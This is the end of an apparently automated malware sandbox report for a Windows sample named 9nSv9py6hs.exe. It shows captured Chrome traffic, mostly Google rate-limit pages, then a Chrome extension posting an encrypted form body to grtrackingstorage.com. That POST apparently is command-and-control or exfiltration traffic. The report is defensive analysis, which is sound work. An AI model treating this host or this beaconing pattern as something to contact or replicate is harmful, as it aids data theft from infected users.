2023-01-17 13:53:08 UTC	13	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 64 64 6c 6a 73 6f 6e 25 33 46 61 73 79 6e Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasyn

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49705	142.251.209.36	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-17 13:53:08 UTC	14	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: NID=511=nUT82hOv6CVwMNqDg-sTtCMJJ6SQ1v_cCpfCpf5nt8EolEbal01GWFyjG01tqWQgh9ciRU880J6nLd2gdbhAJs44PsHAZaVQAFIbrqe2FmFgjrAAK7W9Z8u5LDvwsuZRng98jP6E23SJ4fsPIs326YmnuCwa92dRRCcB6MNeI_o
2023-01-17 13:53:09 UTC	24	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRUETQFGMTQmp4GIjCdLu5bAsoJ6XyRCD8wbnArDCqIGWGdrGc25s-gDELx4DLmHAmEqEe_nKW8fEAZpeYyAXI x-hallmonitor-challenge: CgsIxdCangYQkOSfJxIEVBE0BQ Content-Type: text/html; charset=UTF-8 Permissions-Policy: unload=() Origin-Trial: AqRrpS1jM/HOs1rGR0CnXerKEP/QFz7qj9ApDSZqAO+0U+KcT/h/lxA6akW4ar0kT0V1bw5MD4t8O7L7OFwM5gUAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY3ODIzMzU5OX0= P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Tue, 17 Jan 2023 13:53:09 GMT Server: gws Content-Length: 377 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: __Secure-ENID=9.SE=im_hFBVb6ju7MQ94xcNfHEwKBq_aKlbkcSwx9HUgjvaw61Jga_tZoa9ztwKpcrLTHqhASa0E_ZKgEwYPydVJZKLS5WJResf-ZmqT1xykAntaCd0HGpQxAf_h6RE7k-ISqeotzLwtuPvCwrcUqlA4IMIWOyhCTZdRGGMgFusqapQ; expires=Sat, 17-Feb-2024 06:11:26 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: CONSENT=PENDING+948; expires=Thu, 16-Jan-2025 13:53:08 GMT; path=/; domain=.google.com; Secure Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2023-01-17 13:53:09 UTC	26	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 26 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49706	142.251.209.36	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-17 13:53:08 UTC	14	OUT	GET /sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgRUETQFGMTQmp4GIjA_FxiLdIvCSr2pjYo_QcG2-J_xO8wnmrWG8LfU3EK50P7zj9NvetqCss--zsX0VaYyAXI HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: NID=511=nUT82hOv6CVwMNqDg-sTtCMJJ6SQ1v_cCpfCpf5nt8EolEbal01GWFyjG01tqWQgh9ciRU880J6nLd2gdbhAJs44PsHAZaVQAFIbrqe2FmFgjrAAK7W9Z8u5LDvwsuZRng98jP6E23SJ4fsPIs326YmnuCwa92dRRCcB6MNeI_o
2023-01-17 13:53:08 UTC	17	IN	HTTP/1.1 429 Too Many Requests Date: Tue, 17 Jan 2023 13:53:08 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3126 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2023-01-17 13:53:08 UTC	17	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 64 64 6c 6a 73 6f 6e 3f 61 73 79 6e 63 3d 6e 74 70 3a 32 3c 2f 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/ddljson?async=ntp:2</title>
2023-01-17 13:53:08 UTC	18	IN	Data Raw: 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 61 70 69 2e 6a 73 22 20 61 73 79 6e 63 20 64 65 66 65 72 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 Data Ascii: ript src="https://www.google.com/recaptcha/api.js" async defer></script><script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS
2023-01-17 13:53:08 UTC	19	IN	Data Raw: 22 69 6e 66 6f 44 69 76 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 20 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 20 6d 61 72 67 69 6e 3a 30 20 30 20 31 35 70 78 20 30 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 Data Ascii: "infoDiv" style="display:none; background-color:#eee; padding:10px; margin:0 0 15px 0; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//ww

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49707	142.251.209.36	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-17 13:53:08 UTC	20	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRUETQFGMTQmp4GIjCnQ9-vGhmjishfoWklr8b83BQV6bmHbjAWW2mvQim2K16slZ0NS8RCmnMwyf1ZJ6EyAXI HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEI0e3KAQiUocsBCPyqzAEIvLzMAQiMvcwBCOfAzAEIm8HMAQiywcwBCMTBzAEI18HMAQjZxMwBCMrGzAEInMnMAQjiy8wB Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: NID=511=nUT82hOv6CVwMNqDg-sTtCMJJ6SQ1v_cCpfCpf5nt8EolEbal01GWFyjG01tqWQgh9ciRU880J6nLd2gdbhAJs44PsHAZaVQAFIbrqe2FmFgjrAAK7W9Z8u5LDvwsuZRng98jP6E23SJ4fsPIs326YmnuCwa92dRRCcB6MNeI_o
2023-01-17 13:53:08 UTC	21	IN	HTTP/1.1 429 Too Many Requests Date: Tue, 17 Jan 2023 13:53:08 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3180 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2023-01-17 13:53:08 UTC	21	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 3f 68 6c 3d 65 6e 2d 55 53 26 61 6d 70 3b 61 73 79 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&asy
2023-01-17 13:53:08 UTC	22	IN	Data Raw: 76 3e 0a 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 61 70 69 2e 6a 73 22 20 61 73 79 6e 63 20 64 65 66 65 72 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 Data Ascii: v></noscript><script src="https://www.google.com/recaptcha/api.js" async defer></script><script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="
2023-01-17 13:53:08 UTC	23	IN	Data Raw: 64 20 74 68 69 73 20 68 61 70 70 65 6e 3f 3c 2f 61 3e 3c 62 72 3e 3c 62 72 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 69 6e 66 6f 44 69 76 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 20 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 20 6d 61 72 67 69 6e 3a 30 20 30 20 31 35 70 78 20 30 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 Data Ascii: d this happen?</a><br><br><div id="infoDiv" style="display:none; background-color:#eee; padding:10px; margin:0 0 15px 0; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49708	142.251.209.36	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-17 13:53:09 UTC	26	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRUETQFGMTQmp4GIjCdLu5bAsoJ6XyRCD8wbnArDCqIGWGdrGc25s-gDELx4DLmHAmEqEe_nKW8fEAZpeYyAXI HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: NID=511=nUT82hOv6CVwMNqDg-sTtCMJJ6SQ1v_cCpfCpf5nt8EolEbal01GWFyjG01tqWQgh9ciRU880J6nLd2gdbhAJs44PsHAZaVQAFIbrqe2FmFgjrAAK7W9Z8u5LDvwsuZRng98jP6E23SJ4fsPIs326YmnuCwa92dRRCcB6MNeI_o
2023-01-17 13:53:09 UTC	27	IN	HTTP/1.1 429 Too Many Requests Date: Tue, 17 Jan 2023 13:53:09 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3108 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2023-01-17 13:53:09 UTC	27	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
2023-01-17 13:53:09 UTC	28	IN	Data Raw: 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 61 70 69 2e 6a 73 22 20 61 73 79 6e 63 20 64 65 66 65 72 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a Data Ascii: rc="https://www.google.com/recaptcha/api.js" async defer></script><script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqij
2023-01-17 13:53:09 UTC	29	IN	Data Raw: 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 20 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 20 6d 61 72 67 69 6e 3a 30 20 30 20 31 35 70 78 20 30 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d Data Ascii: yle="display:none; background-color:#eee; padding:10px; margin:0 0 15px 0; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.3	49714	95.141.32.211	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-17 13:53:48 UTC	30	OUT	POST / HTTP/1.1 Host: grtrackingstorage.com Connection: keep-alive Content-Length: 4326 sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" content-type: multipart/form-data; boundary=1594891675526513 Accept: / Origin: chrome-extension://heeogkejeknooohmaoockglpbedaogon Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2023-01-17 13:53:48 UTC	31	OUT	Data Raw: 0d 0a 2d 2d 31 35 39 34 38 39 31 36 37 35 35 32 36 35 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 22 0d 0a 0d 0a 8f 41 d5 d3 90 02 6f 80 90 29 a8 3b 80 a2 92 bb 98 f7 9f 0b 7c fc 87 9a ce 1b 4b c6 83 cd ac 21 39 d0 5e ca 75 68 86 b3 c6 c0 d5 04 03 d5 87 04 bb f9 e9 e7 27 b2 9a 3a eb ce 7a f8 ac c7 a7 1a ca f4 15 f2 51 28 35 03 01 81 3c 37 13 37 3f a1 c9 44 74 fe 08 b4 c5 66 f5 c4 b7 85 0d 91 f5 bf bb 3c 83 55 27 10 0d 6e 87 f9 fa 08 05 1d fe 76 a7 8c 35 4b eb 1b 92 db d8 69 f6 56 3d e0 05 5f b0 12 3f 6b bc 3d 5e 21 fc 26 ad a4 15 c6 65 06 bf d7 b1 67 23 0a 60 d6 9f 02 4e 46 2d 4f 7d 75 5b 2d 53 34 5a f1 36 b8 07 cb f1 4f 0c f0 1f e8 b4 88 aa 87 1b 00 22 83 64 4e 0f d7 33 Data Ascii: --1594891675526513Content-Disposition: form-data; name="b"Ao);\|K!9^uh':zQ(5<77?Dtf<U'nv5KiV=_?k=^!&eg#`NF-O}u[-S4Z6O"dN3
2023-01-17 13:53:48 UTC	35	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 17 Jan 2023 13:53:48 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close
2023-01-17 13:53:48 UTC	35	IN	Data Raw: 31 65 61 0d 0a 72 4a 61 51 56 6a 31 36 48 62 63 61 38 6d 6f 66 43 79 2b 31 4d 59 62 59 57 58 49 51 52 64 51 75 4a 30 41 57 62 39 41 41 6c 67 66 41 32 2f 5a 77 56 45 39 49 49 67 72 45 53 46 42 57 55 31 44 77 65 6a 5a 6a 44 36 74 6f 34 35 51 51 6b 6f 4b 72 6f 7a 4e 51 48 62 39 73 4b 4f 56 4d 45 6a 78 55 7a 48 79 76 41 4f 53 44 65 71 47 69 75 64 6f 56 6b 70 4c 64 30 6c 54 7a 72 47 65 44 56 56 42 6d 32 35 2b 48 76 34 67 46 58 4a 39 6a 45 45 43 6a 41 65 7a 67 34 75 57 69 53 32 2f 38 6d 54 35 43 4f 72 48 73 47 71 6e 48 35 6e 45 4b 35 52 6b 36 58 76 6f 4a 77 76 65 4d 42 6f 70 38 30 4a 74 56 31 6b 4c 45 55 6a 71 49 58 6d 76 7a 6f 35 75 6f 68 67 76 32 30 49 73 36 6a 6f 47 52 41 4d 6f 61 62 77 43 6b 33 6c 37 74 4e 68 59 3d 7a 4d 48 42 31 51 57 70 31 62 45 52 59 4b Data Ascii: 1earJaQVj16Hbca8mofCy+1MYbYWXIQRdQuJ0AWb9AAlgfA2/ZwVE9IIgrESFBWU1DwejZjD6to45QQkoKrozNQHb9sKOVMEjxUzHyvAOSDeqGiudoVkpLd0lTzrGeDVVBm25+Hv4gFXJ9jEECjAezg4uWiS2/8mT5COrHsGqnH5nEK5Rk6XvoJwveMBop80JtV1kLEUjqIXmvzo5uohgv20Is6joGRAMoabwCk3l7tNhY=zMHB1QWp1bERYK

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 9nSv9py6hs.exePID: 5672, Parent PID: 3452

General

Target ID:	0
Start time:	14:52:24
Start date:	17/01/2023
Path:	C:\Users\user\Desktop\9nSv9py6hs.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\9nSv9py6hs.exe
Imagebase:	0x400000
File size:	2440192 bytes
MD5 hash:	A41BA618482F08FB24090AFEE9FF771C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
